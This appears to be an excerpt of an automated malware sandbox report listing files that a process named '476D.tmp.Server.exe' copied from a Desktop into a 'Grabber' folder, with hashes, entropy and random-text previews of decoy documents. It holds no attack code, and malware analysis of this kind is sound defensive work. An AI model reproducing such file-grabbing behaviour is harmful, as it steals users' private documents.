Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
